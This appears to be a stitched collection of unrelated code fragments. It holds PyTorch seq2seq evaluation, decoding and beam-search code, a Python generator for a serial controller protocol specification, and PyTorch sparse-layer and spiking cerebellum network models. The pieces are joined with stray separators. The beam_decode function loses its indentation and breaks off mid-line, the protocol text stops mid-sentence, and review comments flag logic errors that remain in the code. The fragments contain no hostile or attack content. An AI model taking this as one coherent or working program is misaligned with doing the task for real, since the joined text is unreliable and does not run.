        encoder.eval()
    decoder.eval()
    running_loss = 0.0
    token_count = 0.0
    with torch.no_grad():
        for batch_idx, (encoder_inputs, decoder_inputs, decoder_outputs, _) in enumerate(dev_dl):
            if args.development_mode and batch_idx == 1:
                # in dev mode, evaluate a single batch only
                break
            # (a) cross-entropy on the positive target sequence
            ctx = encoder(encoder_inputs) if encoder else EncoderContext()
            ctx = initialize_with_context(encoder, decoder, ctx, args)
            xent_loss = decode(decoder, decoder_inputs, decoder_outputs, ctx, criterion_xent)
            running_loss += xent_loss.item()
            token_count += len(decoder_outputs.target_outputs[0])
            # (b) margin ranking: positive-sequence score vs negative-sequence score
            ctx_pos = encoder(encoder_inputs) if encoder else EncoderContext()
            ctx_pos = initialize_with_context(encoder, decoder, ctx_pos, args)
            pos_score = decode_mrl(decoder, decoder_inputs, decoder_outputs, ctx_pos, criterion_xent, use_neg_sample=False, use_xent_criterion=use_xent_criterion)
            pos_score = pos_score / float(len(decoder_outputs.target_outputs[0]))
            ctx_neg = encoder(encoder_inputs) if encoder else EncoderContext()
            ctx_neg = initialize_with_context(encoder, decoder, ctx_neg, args)
            neg_score = decode_mrl(decoder, decoder_inputs, decoder_outputs, ctx_neg, criterion_xent, use_neg_sample=True, use_xent_criterion=use_xent_criterion)
            neg_score = neg_score / float(len(decoder_outputs.target_outputs_neg[0]))
            # target=-1 asks the ranking loss to rank the second score higher
            margin_target = to_var(torch.FloatTensor((1)).fill_(-1))
            rank_loss = criterion_mrl(pos_score.unsqueeze(0), neg_score.unsqueeze(0), margin_target)
            running_loss += rank_loss.item()
            token_count += len(decoder_outputs.target_outputs[0])
    return EvaluationResult(running_loss, token_count)
def decode(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion, visualize=False, params=None):
    """
    Teacher-forced decoding pass.

    Feeds each gold input token to the decoder one step at a time and sums the
    criterion loss of each step's prediction against the gold output token.

    Args:
        decoder: module called as decoder(input, hidden, encoder_context).
        decoder_inputs: holder whose target_inputs field is the gold input sequence.
        decoder_outputs: holder whose target_outputs field is the gold output sequence.
        encoder_context: provides the initial decoder hidden state.
        criterion: per-step loss function.
        visualize: if True, render the autograd graph of the first step with
            torchviz and stop immediately (returns the so-far loss, i.e. 0.0).
        params: parameter dict forwarded to torchviz.make_dot.

    Returns:
        Summed per-step loss tensor (or 0.0 when visualize short-circuits).
    """
    inputs = to_var(decoder_inputs.target_inputs)
    targets = to_var(decoder_outputs.target_outputs)
    hidden = encoder_context.decoder_hidden
    total = 0.0
    num_steps = len(inputs[0])
    for step in range(num_steps):
        # the gold token at this step becomes the next decoder input
        step_input = inputs[0][step].view(1, -1)
        output, hidden, _ = decoder(step_input, hidden, encoder_context)
        if visualize:
            # draw the computation graph for the first step only, then stop
            from torchviz import make_dot
            make_dot(output, params).view()
            break
        total += criterion(output, targets[0][step].view(1))
    return total
def decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion_xent, use_neg_sample=False, use_xent_criterion=False):
    """
    Score one target sequence under teacher forcing, for the ranking objective.

    Args:
        decoder: module called as decoder(input, hidden, encoder_context).
        decoder_inputs: holder with target_inputs / target_inputs_neg fields.
        decoder_outputs: holder with target_outputs / target_outputs_neg fields.
        encoder_context: provides the initial decoder hidden state.
        criterion_xent: per-step criterion, used only when use_xent_criterion.
        use_neg_sample: if True, score the negative (contrastive) sequence
            instead of the positive one.
        use_xent_criterion: if True, accumulate cross-entropy per step;
            otherwise accumulate the raw log-probability of each gold token
            (a log-likelihood score, not a loss).

    Returns:
        Scalar tensor: the summed per-step score over the whole sequence.
    """
    target_inputs = to_var(decoder_inputs.target_inputs) if not use_neg_sample else to_var(decoder_inputs.target_inputs_neg)
    target_outputs = to_var(decoder_outputs.target_outputs) if not use_neg_sample else to_var(decoder_outputs.target_outputs_neg)
    decoder_hidden = encoder_context.decoder_hidden
    # Build the LogSoftmax module once instead of re-instantiating it on every
    # timestep (the original constructed it inside the loop).
    # NOTE(review): no dim= is given, so torch falls back to its deprecated
    # implicit-dim heuristic; confirm decoder_output's rank and pin dim explicitly.
    log_softmax = nn.LogSoftmax()
    loss = 0.0
    for t in range(len(target_inputs[0])):
        # next input is the current gold token (teacher forcing)
        decoder_input = target_inputs[0][t].view(1, -1)
        decoder_output, decoder_hidden, _ = decoder(decoder_input, decoder_hidden, encoder_context)
        if use_xent_criterion:
            loss += criterion_xent(decoder_output, target_outputs[0][t].view(1))
        else:
            # accumulate log P(gold token)
            log_probs = log_softmax(decoder_output)
            loss += log_probs.view(-1)[target_outputs[0][t].item()]
    return loss
def initialize_with_context(encoder, decoder, encoder_context, args):
    """
    Condition the decoder on the encoder's output, mutating encoder_context.

    Four stages, each gated by an args flag:
      1. decoder_hidden_concat: extra vector concatenated to the hidden state
         (empty tensor when disabled, random when enabled but absent).
      2. decoder_hidden: either cleared to None, or merged with the concat
         vector and tiled across all decoder layers (layer 0 gets the encoder
         state, remaining layers start at zero).
      3. decoder_input_concat: extra vector concatenated to decoder inputs.
      4. optionally advance the decoder one step on decoder_input_t0.

    The ``encoder`` argument is unused but kept for caller compatibility.
    Returns the (mutated) encoder_context.
    """
    def _stack_hidden(encoder_hidden):
        """Spread one hidden state over every decoder layer: the flattened
        encoder state first, zero vectors for the remaining layers, reshaped
        to (num_hidden_layers, 1, -1)."""
        flat = encoder_hidden.view(-1)
        width = flat.size()[0]
        zeros = torch.zeros(width)
        if torch.cuda.is_available():
            zeros = zeros.cuda()
        stacked = torch.cat([flat] + [zeros] * (decoder.num_hidden_layers - 1))
        return stacked.view(decoder.num_hidden_layers, 1, -1)

    # 1) hidden-state concatenation vector
    if not args.concatenate_decoder_hidden:
        empty = torch.Tensor([])
        encoder_context.decoder_hidden_concat = empty.cuda() if torch.cuda.is_available() else empty
    else:
        hidden_cat = encoder_context.decoder_hidden_concat
        if not isinstance(hidden_cat, torch.Tensor) and not hidden_cat:
            # no context supplied: fall back to a random vector
            rand = _stack_hidden(torch.randn(1, 1, args.decoder_hidden_concat_size))
            encoder_context.decoder_hidden_concat = rand.cuda() if torch.cuda.is_available() else rand
        elif isinstance(hidden_cat, tuple):
            # lstm-style (h, c): keep only h
            encoder_context.decoder_hidden_concat = hidden_cat[0]

    # 2) decoder hidden state
    if not args.set_decoder_hidden:
        encoder_context.decoder_hidden = None
    else:
        hidden = encoder_context.decoder_hidden
        if not isinstance(hidden, torch.Tensor) and not hidden:
            print("ERROR: you specified to initialize decoder hidden state with encoder context, but no context was given.")
            sys.exit(0)
        merged = torch.cat((hidden, encoder_context.decoder_hidden_concat), 2)
        if isinstance(merged, tuple): # true in case of lstm
            # TODO: BROKEN -- FIX ME (torch.cat above would already fail on a tuple)
            encoder_context.decoder_hidden = (_stack_hidden(merged[0]), _stack_hidden(merged[1]))
        else: # true in case of gru and non-rnn modules
            encoder_context.decoder_hidden = _stack_hidden(merged)

    # 3) input concatenation vector
    if not args.concatenate_decoder_inputs:
        empty = torch.Tensor([])
        encoder_context.decoder_input_concat = empty.cuda() if torch.cuda.is_available() else empty
    else:
        input_cat = encoder_context.decoder_input_concat
        if not isinstance(input_cat, torch.Tensor) and not input_cat:
            rand = torch.randn(1, 1, args.decoder_input_concat_size)
            encoder_context.decoder_input_concat = rand.cuda() if torch.cuda.is_available() else rand
        elif isinstance(input_cat, tuple):
            encoder_context.decoder_input_concat = input_cat[0]

    # 4) optionally advance the decoder one step on a priming input
    if args.advance_decoder_t0:
        decoder_input = encoder_context.decoder_input_t0
        _, encoder_context.decoder_hidden, _ = decoder(decoder_input, encoder_context.decoder_hidden, encoder_context, bypass_embed=True)
    return encoder_context
# BEAM SEARCH DECODING
# FIXME: Avoid use magic strings everywhere for SOS and EOS tokens
class Sentence:
    """
    A partial hypothesis (beam entry) during beam-search decoding.

    Holds the decoder hidden state to resume from, the last emitted token index,
    that token's 1-based rank among its beam siblings (used by diverse
    decoding's sibling penalty), and the parallel lists of emitted token
    indexes and their log-probability scores.
    """
    def __init__(self, decoder_hidden, last_idx, last_idx_sibling_rank, sentence_idxes=None, sentence_scores=None):
        """
        Args:
            decoder_hidden: decoder hidden state after emitting last_idx.
            last_idx: index of the most recently emitted token.
            last_idx_sibling_rank: 1-based rank among beam siblings.
            sentence_idxes: token indexes emitted so far (defaults to empty).
            sentence_scores: per-token scores, parallel to sentence_idxes.

        Raises:
            ValueError: if the two lists have different lengths.
        """
        # BUG FIX: the original used mutable default arguments ([]), which are
        # shared across all calls; use None sentinels instead.
        sentence_idxes = [] if sentence_idxes is None else sentence_idxes
        sentence_scores = [] if sentence_scores is None else sentence_scores
        if len(sentence_idxes) != len(sentence_scores):
            raise ValueError("length of indexes and scores should be the same")
        self.decoder_hidden = decoder_hidden
        self.last_idx = last_idx
        self.last_idx_sibling_rank = last_idx_sibling_rank # needed for diverse decoding
        self.sentence_idxes = sentence_idxes
        self.sentence_scores = sentence_scores

    def likelihoodScore(self):
        """Mean per-token score; a large negative sentinel for empty hypotheses."""
        if len(self.sentence_scores) == 0:
            return -99999999.999 # TODO: check
        # NOTE: No need to length normalize when making selection for beam.
        # Only needed during final selection.
        return sum(self.sentence_scores) / len(self.sentence_scores)

    def penalizedLikelihoodScore(self, gamma):
        """
        Summed score minus a sibling-rank penalty.
        Diverse decoding: https://arxiv.org/pdf/1611.08562.pdf
        """
        return sum(self.sentence_scores) - gamma * self.last_idx_sibling_rank

    def addTopk(self, topi, topv, decoder_hidden, beam_size, voc, EOS_token):
        """
        Expand this hypothesis with the beam_size best next tokens.

        Returns:
            (terminates, sentences): terminates holds at most one
            (word_list, score) tuple if EOS was among the top-k; sentences
            holds the non-terminal child hypotheses.
        """
        terminates, sentences = [], []
        for i in range(beam_size):
            if topi[0][i] == EOS_token:
                terminates.append(([voc.idx2word[idx.item()] for idx in self.sentence_idxes] + ['</architect>'], # TODO: need the eos token?
                    self.likelihoodScore())) # tuple(word_list, score_float)
                continue
            # copy the lists so children do not share history with this node
            idxes = self.sentence_idxes[:]
            scores = self.sentence_scores[:]
            idxes.append(topi[0][i])
            scores.append(topv[0][i])
            sentences.append(Sentence(decoder_hidden, topi[0][i], i+1, idxes, scores))
        return terminates, sentences # NOTE: terminates can be of size 0 or 1 only

    def toWordScore(self, voc, EOS_token):
        """Render the hypothesis as (word_list, mean_score), always EOS-terminated."""
        words = []
        for i in range(len(self.sentence_idxes)):
            if self.sentence_idxes[i] == EOS_token: # NOTE: never hit
                words.append('</architect>')
            else:
                words.append(voc.idx2word[self.sentence_idxes[i].item()])
        if self.sentence_idxes[-1] != EOS_token:
            words.append('</architect>')
        return (words, self.likelihoodScore())
def beam_decode(decoder, encoder_context, voc, beam_size, max_length, gamma=None, num_top_sentences=1):
decoder_hidden = encoder_context.decoder_hidden
terminal_sentences, prev_top_sentences, next_top_sentences = [], [], []
prev_top_sentences.append(Sentence(decoder_hidden=decoder_hidden, last_idx=voc('<architect>'), last_idx_sibling_rank=1))
for _ in range(max_length):
for | |
<gh_stars>1-10
from textwrap import dedent
def get_static_part(protocol):
s = dedent("""
Communication protocol specification
====================================
Communication protocol v{0}
.. contents::
:local:
Protocol description
--------------------
Controller can be controlled from the PC using serial connection
(COM-port). COM-port parameters are fixed controller-side:
- Speed: 115200 baud
- Frame size: 8 bits
- Stop-bits: 2 bits
- Parity: none
- Flow control: none
- Byte receive timeout: 400 ms
- Bit order: little endian
- Byte order: little endian
Command execution
-----------------
All data transfers are initiated by the PC, meaning that the
controller waits for incoming commands and replies accordingly. Each
command is followed by the controller response, with rare exceptions
of some service commands. One should not send another command without
waiting for the previous command answer.
Commands are split into service, general control and general
information types.
Commands are executed immediately. Parameters which are set by Sxxx
commands are applied no later than 1ms after acknowledgement.
Command processing does not affect real-time engine control (PWM,
encoder readout, etc).
Both controller and PC have an IO buffer. Received commands and
command data are processed once and then removed from buffer.
Each command consists of 4-byte identifier and optionally a data
section followed by its 2-byte CRC. Data can be transmitted in both
directions, from PC to the controller and vice versa. Command is
scheduled for execution if it is a legitimate command and (in case of
data) if its CRC matches. After processing a correct command
controller replies with 4 bytes - the name of processed command,
followed by data and its 2-byte CRC, if the command is supposed to
return data.
Controller-side error processing
--------------------------------
Wrong command or data
~~~~~~~~~~~~~~~~~~~~~
If the controller receives a command that cannot be interpreted as a
legitimate command, then controller ignores this command, replies with
an "errc" string and sets "command error" flag in the current status
data structure. If the unrecognized command contained additional data,
then it can be interpreted as new command(s). In this case
resynchronization is required.
If the controller receives a valid command with data and its CRC
doesn't match the CRC computed by the controller, then controller
ignores this command, replies with an "errd" string and sets "data
error" flag in the current status data structure. In this case
synchronization is not needed.
CRC calculation
~~~~~~~~~~~~~~~
CRC is calculated for data only, 4-byte command identifier is not
included. CRC algorithm in C is as follows:
.. code-block:: c
unsigned short CRC16(INT8U *pbuf, unsigned short n)
{{
unsigned short crc, i, j, carry_flag, a;
crc = 0xffff;
for(i = 0; i < n; i++)
{{
crc = crc ^ pbuf[i];
for(j = 0; j < 8; j++)
{{
a = crc;
carry_flag = a & 0x0001;
crc = crc >> 1;
if ( carry_flag == 1 ) crc = crc ^ 0xa001;
}}
}}
return crc;
}}
This function receives a pointer to the data array, pbuf, and data
length in bytes, n. It returns a two byte CRC code.
**The example of CRC calculation:**
**Command code (CMD):** \"home\" or 0x656D6F68
.. code-block:: c
0x68 0x6F 0x6D 0x65
CMD
**Command code (CMD):** \"gpos\" or 0x736F7067
.. code-block:: c
0x67 0x70 0x6F 0x73
CMD
**Command code (CMD):** \"movr\" or 0x72766F6D
.. code-block:: c
0x6D 0x6F 0x76 0x72 0x00 0x00 0x00 0xC8 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x53 0xc7
CMD DeltaPosition uDPos Reserved CRC
.. figure:: crc.png
:align: center
Transmission errors
~~~~~~~~~~~~~~~~~~~
Most probable transmission errors are missing, extra or altered byte.
In usual settings transmission errors happen rarely, if at all.
Frequent errors are possible when using low-quality or broken
USB-cable or board interconnection cable. Protocol is not designed for
use in noisy environments and in rare cases an error may match a valid
command code and get executed.
Missing byte, controller side
"""""""""""""""""""""""""""""""
A missing byte on the controller side leads to a timeout on the PC
side. Command is considered to be sent unsuccessfully by the PC.
Synchronization is momentarily disrupted and restored after a timeout.
Missing byte, PC side
""""""""""""""""""""""""
A missing byte on the PC side leads to a timeout on PC side.
Synchronization is maintained.
Extra byte, controller side
""""""""""""""""""""""""""""""
An extra byte received by the controller leads to one or several
"errc" or "errd" responses. Command is considered to be sent
unsuccessfully by the PC. Receive buffer may also contain one or
several "errc" or "errd" responses. Synchronization is disrupted.
Extra byte, PC side
""""""""""""""""""""""""
An extra byte received by the PC leads to an incorrectly interpreted
command or CRC and an extra byte in the receive buffer.
Synchronization is disrupted.
Altered byte, controller side
""""""""""""""""""""""""""""""
An altered byte received by the controller leads to one or several
"errc" or "errd" responses. Command is considered to be sent
unsuccessfully by the PC. Receive buffer may also contain one or
several "errc" or "errd" responses. Synchronization can rarely be
disrupted, but is generally maintained.
Altered byte, PC side
""""""""""""""""""""""""
An altered byte received by the PC leads to an incorrectly interpreted
command or CRC. Synchronization is maintained.
Timeout resynchronization
~~~~~~~~~~~~~~~~~~~~~~~~~
If during packet reception next byte wait time exceeds timeout value,
then partially received command is ignored and receive buffer is
cleared. Controller timeout should be less than PC timeout, taking into
account time it takes to transmit the data.
Zero byte resynchronization
~~~~~~~~~~~~~~~~~~~~~~~~~~~
There are no command codes that start with a zero byte ('\\\\0'). This
allows for a following synchronization procedure: controller always
answers with a zero byte if the first command byte is zero, PC ignores
first response byte if it is a zero byte. Then, if synchronization is
disrupted on either side the following algorithm is used:
In case PC receives "errc", "errd" or a wrong command answer code,
then PC sends 4 to 250 zeroes to the controller (250 byte limit is
caused by input buffer length and usage of I2C protocol, less than 4
zeroes do not guarantee successful resynchronization). During this
time PC continuously reads incoming bytes from the controller until
the first zero is received and stops sending and receiving right after
that.
Received zero byte is likely not a part of a response to a previous
command because on error PC receives "errc"/"errd" response. It is
possible in rare cases, then synchronization procedure will start
again. Therefore first zero byte received by the PC means that
controller input buffer is already empty and will remain so until any
command is sent. Right after receiving first zero byte from the
controller PC is ready to transmit next command code. The rest of zero
bytes in transit will be ignored because they will be received before
controller response.
This completes the zero byte synchronization procedure.
Library-side error processing
-----------------------------
Nearly every library function has a return status of type `result_t`.
After sending command to the controller library reads incoming bytes
until a non-zero byte is received. All zero bytes are ignored. Library
reads first 4 bytes and compares them to the command code. It then
waits for data section and CRC, if needed. If first 4 received bytes
do not match the sent command identifier, then zero byte
synchronization procedure is launched, command is considered to be
sent unsuccessfully. If first 4 received bytes match the sent command
identifier and command has data section, but the received CRC doesn't
match CRC calculated from the received data, then zero byte
synchronization procedure is launched, command is considered to be
sent unsuccessfully. If a timeout is reached while the library is
waiting for the controller response, then zero byte synchronization
procedure is launched, command is considered to be sent
unsuccessfully.
If no errors were detected, then command is considered to be
| |
* mask
# if bias is not None and ctx.needs_input_grad[2]:
if ctx.needs_input_grad[2]:
grad_bias = grad_output.sum(0).squeeze(0)
return grad_input, grad_weight, grad_bias, grad_mask
class SparseLinear(nn.Module):
    """
    Linear layer whose connectivity is restricted by a fixed binary mask.

    The mask is supplied as (input_features, output_features) with 1 marking a
    present connection, and is stored transposed to match the (out, in) weight
    layout. The forward pass delegates to SparseLinearFunction so the mask is
    applied consistently in both forward and backward.
    """
    def __init__(self, input_features, output_features, bias=True, mask=None):
        """
        Args:
            input_features: size of each input sample.
            output_features: size of each output sample.
            bias: whether to learn an additive bias term.
            mask: optional array-like of shape
                (input_features, output_features) with 0/1 entries marking
                absent/present connections.
        """
        super(SparseLinear, self).__init__()
        self.input_features = input_features
        self.output_features = output_features
        # Assigning an nn.Parameter attribute registers it with the module.
        self.weight = nn.Parameter(torch.Tensor(output_features, input_features))
        if bias:
            self.bias = nn.Parameter(torch.Tensor(output_features))
        else:
            # register the optional parameter as explicitly absent
            self.register_parameter('bias', None)
        self.init_params()
        if mask is None:
            self.register_parameter('mask', None)
        else:
            # transpose to the (out, in) weight layout and freeze it
            mask_t = torch.tensor(mask, dtype=torch.float).t()
            self.mask = nn.Parameter(mask_t, requires_grad=False)

    def init_params(self):
        """Uniform init in +/- 1/sqrt(fan_in) for weight and bias."""
        bound = 1. / math.sqrt(self.weight.size(1))
        self.weight.data.uniform_(-bound, bound)
        if self.bias is not None:
            self.bias.data.uniform_(-bound, bound)

    def forward(self, input):
        """Masked affine transform via the custom autograd function."""
        return SparseLinearFunction.apply(
            input, self.weight, self.bias, self.mask)

    def extra_repr(self):
        """Summary shown when printing the module."""
        return 'input_features={}, output_features={}, bias={}, mask={}'.format(
            self.input_features, self.output_features,
            self.bias is not None, self.mask is not None)
class cere_SNN(nn.Module):
    """
    Cerebellum-inspired spiking network: MF -> GC (sparse) -> PC -> DCN.

    Layer widths are multiples of the requested counts (x16 for MF input,
    x4 for MF/GC/PC, x8 for DCN) -- presumably population coding; confirm.
    NOTE(review): relies on module-level helpers `gen_mask`, `mem_update` and
    flag `if_bias` defined elsewhere in this file, and forward allocates state
    with .cuda(), so a GPU is required.
    """
    def __init__(self,batch_size,num_in_MF,num_out_MF,num_out_GC,num_out_PC,num_out_DCN,possion_num=50):
        super(cere_SNN, self).__init__()
        self.batch_size = batch_size
        self.num_in_MF = num_in_MF*16
        self.num_out_MF = num_out_MF*4
        self.num_out_GC = num_out_GC*4
        self.num_out_PC = num_out_PC*4
        self.num_out_DCN = num_out_DCN*8
        self.possion_num = possion_num
        # each GC unit receives exactly 4 MF inputs (sparse connectivity)
        MF_GC_mask = gen_mask(self.num_out_MF, self.num_out_GC,num_ones=4)
        self.fc1 = nn.Linear(self.num_in_MF, self.num_out_MF, bias = if_bias)
        self.fc2 = SparseLinear(self.num_out_MF, self.num_out_GC, bias = if_bias,mask=MF_GC_mask)
        self.fc3 = nn.Linear(self.num_out_GC, self.num_out_PC, bias = if_bias)
        self.fc4 = nn.Linear(self.num_out_PC, self.num_out_DCN, bias = if_bias)
        # NOTE(review): "%e" is never interpolated -- print receives two arguments
        print("number of parameters: %e", sum(p.numel() for p in self.parameters()))
    def forward(self,m,u,sigma,f, time_window):
        """
        Simulate time_window steps and return the summed DCN spike output.

        Args:
            m, u, sigma, f: input tensors, concatenated along dim 1 and then
                indexed [:, :, t] each step -- presumably shaped
                (batch, features, time); TODO confirm against callers.
            time_window: number of simulation timesteps.
        """
        self.fc1 = self.fc1.float()
        # self.fc3.weight.data = torch.clamp(self.fc3.weight, -100, 0)
        # membrane potentials / spike trains start at zero (CUDA tensors)
        h1_mem = h1_spike = h1_sumspike = torch.zeros(self.batch_size, self.num_out_MF).cuda()
        h2_mem = h2_spike = h2_sumspike = torch.zeros(self.batch_size, self.num_out_GC).cuda()
        h3_mem = h3_spike = h3_sumspike = torch.zeros(self.batch_size, self.num_out_PC).cuda()
        h4_mem = h4_spike = h4_sumspike = torch.zeros(self.batch_size, self.num_out_DCN).cuda()
        input = torch.cat((m,u,sigma,f),1)
        x = input
        sum_out = None
        for t in range(time_window):
            x_t = x[:,:,t]
            x_t = x_t.view(self.batch_size, -1)
            # MF layer
            h1_mem, h1_spike = mem_update(self.fc1, x_t, h1_mem, h1_spike)
            #h1_sumspike += h1_spike
            # GC layer (sparse MF->GC connectivity)
            h2_mem, h2_spike = mem_update(self.fc2, h1_spike, h2_mem, h2_spike)
            #h1_sumspike += h1_spike
            # PC layer
            h3_mem, h3_spike = mem_update(self.fc3, h2_spike, h3_mem, h3_spike)
            #h1_sumspike += h1_spike
            #DCN:
            # PC output inhibits DCN; mean MF activity acts as excitatory baseline
            baseline_MF = torch.mean(h1_spike)
            m_DCN_in = -h3_spike + torch.abs(baseline_MF)
            h4_mem, h4_spike = mem_update(self.fc4, m_DCN_in, h4_mem, h4_spike)
            #h1_sumspike += h1_spike
            # accumulate DCN spikes over time
            sum_out = h4_spike if sum_out is None else sum_out + h4_spike
        return sum_out
class cere_model(nn.Module):
    """
    Cerebellum model with four parallel feature pathways (m, u, sigma, f):
    MF -> GC per pathway, merged into excitatory/inhibitory Purkinje cells
    (PCE/PCI), then a deep-cerebellar-nuclei (DCN) readout.

    NOTE(review): depends on module-level `mem_update` and `if_bias` defined
    elsewhere in this file; forward allocates state with .cuda(), so a GPU is
    required.
    """
    def __init__(self,batch_size,num_in_MF,
                 num_out_MF,num_out_GC,num_out_PC,num_out_DCN,possion_num=50,gpu='0'):
        super(cere_model,self).__init__()
        self.batch_size = batch_size
        self.num_out_MF = num_out_MF
        self.num_out_GC = num_out_GC
        self.num_out_PC = num_out_PC
        self.num_out_DCN = num_out_DCN
        self.possion_num = possion_num
        self.device = torch.device("cuda:"+gpu if torch.cuda.is_available() else "cpu")
        #MF: every class coded by 4 neurons
        self.m_MF = nn.Linear(num_in_MF*4, num_out_MF, bias = if_bias)
        self.u_MF = nn.Linear(num_in_MF*4, num_out_MF, bias = if_bias)
        self.sigma_MF = nn.Linear(num_in_MF*4, num_out_MF, bias = if_bias)
        self.f_MF = nn.Linear(num_in_MF*4, num_out_MF, bias = if_bias)
        #GC:
        num_in_GC=num_out_MF
        self.m_GC = nn.Linear(num_in_GC, num_out_GC, bias = if_bias)
        self.u_GC = nn.Linear(num_in_GC, num_out_GC, bias = if_bias)
        self.sigma_GC = nn.Linear(num_in_GC, num_out_GC, bias = if_bias)
        self.f_GC = nn.Linear(num_in_GC, num_out_GC, bias = if_bias)
        #PC: all four GC pathways feed each Purkinje population
        num_in_PC=4*num_out_GC
        #PC E
        self.m_PCE = nn.Linear(num_in_PC, num_out_PC, bias = if_bias)
        #PC I
        self.m_PCI = nn.Linear(num_in_PC, num_out_PC, bias = if_bias)
        #DCN: every class coded by 4 neurons
        num_in_DCN=num_out_PC
        self.m_DCN = nn.Linear(num_in_DCN, num_out_DCN*8, bias = if_bias)
        # NOTE(review): "%e" is never interpolated -- print receives two arguments
        print("number of parameters: %e", sum(p.numel() for p in self.parameters()))
        # #STDP prams
        # #monitor
        # self.monitor_MF_m = torch.zeros(self.batch_size, self.num_out_MF, self.possion_num).to(self.device)
        # self.monitor_MF_u = torch.zeros(self.batch_size, self.num_out_MF, self.possion_num).to(self.device)
        # self.monitor_MF_sigma = torch.zeros(self.batch_size, self.num_out_MF, self.possion_num).to(self.device)
        # self.monitor_MF_f = torch.zeros(self.batch_size, self.num_out_MF, self.possion_num).to(self.device)
        # self.monitor_GC_m = torch.zeros(self.batch_size, self.num_out_GC, self.possion_num).to(self.device)
        # self.monitor_GC_u = torch.zeros(self.batch_size, self.num_out_GC, self.possion_num).to(self.device)
        # self.monitor_GC_sigma = torch.zeros(self.batch_size, self.num_out_GC, self.possion_num).to(self.device)
        # self.monitor_GC_f = torch.zeros(self.batch_size, self.num_out_GC, self.possion_num).to(self.device)
        # self.monitor_PCE_m = torch.zeros(self.batch_size, self.num_out_PC, self.possion_num).to(self.device)
        # self.monitor_PCI_m = torch.zeros(self.batch_size, self.num_out_PC, self.possion_num).to(self.device)
        # self.monitor_DCN_m = torch.zeros(self.batch_size, self.num_out_DCN*8, self.possion_num).to(self.device)
    def forward(self,m,u,sigma,f, time_window):
        """
        Simulate the network and return summed DCN spikes for the m pathway.

        Args:
            m, u, sigma, f: per-feature inputs indexed [:, :, t] per timestep --
                presumably (batch, features, time); TODO confirm.
            time_window: number of simulation timesteps.

        NOTE(review): the outer `step` loop repeats the entire inner `t` loop
        time_window times WITHOUT resetting membrane state between repeats, and
        only the final repeat's spike sum is returned (time_window^2 total
        updates). This looks like a leftover from refactoring -- confirm intent.
        NOTE(review): monitor_DCN_m is sized by possion_num but indexed by t in
        range(time_window); this overruns if time_window > possion_num.
        """
        batch_size = m.shape[0]
        # spike monitor for the DCN population, rebuilt every forward call
        self.monitor_DCN_m = torch.zeros(batch_size, self.num_out_DCN*8, self.possion_num).cuda()
        # membrane potentials and spike trains start at zero for every layer
        m_MF_mem = m_MF_spike = u_MF_mem = u_MF_spike = sigma_MF_mem = sigma_MF_spike = f_MF_mem = f_MF_spike = torch.zeros(batch_size, self.num_out_MF).cuda()
        m_GC_mem = m_GC_spike = u_GC_mem = u_GC_spike = sigma_GC_mem = sigma_GC_spike = f_GC_mem = f_GC_spike = torch.zeros(batch_size, self.num_out_GC).cuda()
        m_PCE_mem = m_PCE_spike = u_PCE_mem = u_PCE_spike = m_PCI_mem = m_PCI_spike = u_PCI_mem = u_PCI_spike = torch.zeros(batch_size, self.num_out_PC).cuda()
        m_DCN_mem = m_DCN_spike = torch.zeros(batch_size, self.num_out_DCN*8).cuda()
        m = m.float()
        u = u.float()
        sigma = sigma.float()
        f = f.float()
        for step in range(time_window):
            # NOTE(review): sum_out_u is reset here but never written or returned
            sum_out_m = sum_out_u = None
            #x = x.float()
            #x = x.view(self.batch_size, -1)
            #x_t = torch.from_numpy(x[:,t]).float().to(self.device)
            for t in range(time_window):
                # slice out timestep t for each feature stream
                m_t = m[:,:,t]
                m_t = m_t.view(batch_size, -1)
                u_t = u[:,:,t]
                u_t = u_t.view(batch_size, -1)
                sigma_t = sigma[:,:,t]
                sigma_t = sigma_t.view(batch_size, -1)
                f_t = f[:,:,t]
                f_t = f_t.view(batch_size, -1)
                #MF:
                m_MF_mem, m_MF_spike = mem_update(self.m_MF, m_t, m_MF_mem, m_MF_spike)
                u_MF_mem, u_MF_spike = mem_update(self.u_MF, u_t, u_MF_mem, u_MF_spike)
                sigma_MF_mem, sigma_MF_spike = mem_update(self.sigma_MF, sigma_t, sigma_MF_mem, sigma_MF_spike)
                f_MF_mem, f_MF_spike = mem_update(self.f_MF, f_t, f_MF_mem, f_MF_spike)
                #GC:
                m_GC_mem, m_GC_spike = mem_update(self.m_GC, m_MF_spike, m_GC_mem, m_GC_spike)
                u_GC_mem, u_GC_spike = mem_update(self.u_GC, u_MF_spike, u_GC_mem, u_GC_spike)
                sigma_GC_mem, sigma_GC_spike = mem_update(self.sigma_GC, sigma_MF_spike, sigma_GC_mem, sigma_GC_spike)
                f_GC_mem, f_GC_spike = mem_update(self.f_GC, f_MF_spike, f_GC_mem, f_GC_spike)
                #PC:
                #combine tensor
                # NOTE(review): cat along dim 0 then view(batch_size, -1)
                # interleaves batches across streams -- confirm this is the
                # intended layout rather than cat along dim 1.
                PF_in = torch.cat((m_GC_spike,u_GC_spike,sigma_GC_spike,f_GC_spike),0)
                PF_in = PF_in.view(batch_size, -1)
                MF_in = torch.cat((m_MF_spike,u_MF_spike,sigma_MF_spike,f_MF_spike),0)
                MF_in = MF_in.view(batch_size, -1)
                m_PCE_mem, m_PCE_spike = mem_update(self.m_PCE, PF_in, m_PCE_mem, m_PCE_spike)
                m_PCI_mem, m_PCI_spike = mem_update(self.m_PCI, PF_in, m_PCI_mem, m_PCI_spike)
                #DCN:
                # mean MF activity acts as an excitatory baseline for DCN input
                baseline_MF = torch.mean(MF_in)
                m_DCN_in = m_PCE_spike + m_PCI_spike + baseline_MF
                m_DCN_mem, m_DCN_spike = mem_update(self.m_DCN, m_DCN_in, m_DCN_mem, m_DCN_spike)
                # with torch.no_grad():
                # self.monitor_MF_m[:,:,t] = m_MF_spike.detach()
                # self.monitor_MF_u[:,:,t] = u_MF_spike.detach()
                # self.monitor_MF_sigma[:,:,t] = sigma_MF_spike.detach()
                # self.monitor_MF_f[:,:,t] = f_MF_spike.detach()
                # self.monitor_GC_m[:,:,t] = m_GC_spike.detach()
                # self.monitor_GC_u[:,:,t] = u_GC_spike.detach()
                # self.monitor_GC_sigma[:,:,t] = sigma_GC_spike.detach()
                # self.monitor_GC_f[:,:,t] = f_GC_spike.detach()
                # self.monitor_PCE_m[:,:,t] = m_PCE_spike.detach()
                # self.monitor_PCI_m[:,:,t] = m_PCI_spike.detach()
                self.monitor_DCN_m[:,:,t] = m_DCN_spike
